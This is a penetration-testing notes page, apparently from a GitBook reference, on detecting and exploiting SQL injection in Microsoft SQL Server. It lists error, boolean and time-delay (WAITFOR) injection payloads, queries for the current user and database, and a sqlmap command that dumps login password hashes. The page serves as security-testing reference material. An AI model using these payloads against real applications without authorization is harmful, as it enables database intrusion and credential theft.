InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Vulnerable parameters detection
  • Databases dumping
  • References
  1. Web applications
  2. Exploitation - SQL injections

MSSQL.md

Microsoft SQL Server is a relational database management system developed by Microsoft. Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available : https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an

MSSQL supports stacked queries.

Vulnerable parameters detection

Injection locations

In a HTTP request there are a few possible injection points :

  • URL parameters

  • POST parameters

  • Cookie names and values

  • Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

Injection detection

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application. Supplying malformed queries will trigger errors and sending valid queries with various boolean logic statements may trigger different responses from the web server. Time based payload can also be used to detect SQL injection in MSSQL.

Technique
Queries

Error A direct message can be returned or the page may act differently

x=' x='' x=" x="" x=\ x=\\ x=\' ...

Boolean Testing Page can react differently if true or false

x=1 or 1=1 -- true x=1' or 1=1 -- true x=1" or 1=1 -- true x=1 or 1=2 -- false ...

Time Based A delay can be induced by the query execution

x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds x=1 WAITFOR TIME '22:42' -- Wait until 22:42 ...

Automated detection

The detection of vulnerable parameters can be automated, using the BurpSuite Pro scanner or sqlmap for example.

Note that second order SQL injection, which arises when user-supplied data is first stored by the application and then later incorporated into SQL queries in an unsafe manners, may not be properly detected by automatic tools.

Databases dumping

Description
Queries

Comments

Encoding queries

Obfuscating queries

Disable logging mechanisms

MSSQL version

Current user

SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))

Users and privileges

Users' passwords

Using sqlmap: sqlmap -D master -T sys.sql_logins --dump [...]

Databases

Current database

SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))

Tables

Columns

Data

References

https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ https://www.asafety.fr/mssql-injection-cheat-sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet

PreviousSQLMAP.mdNextMySQL.md

Last updated 3 years ago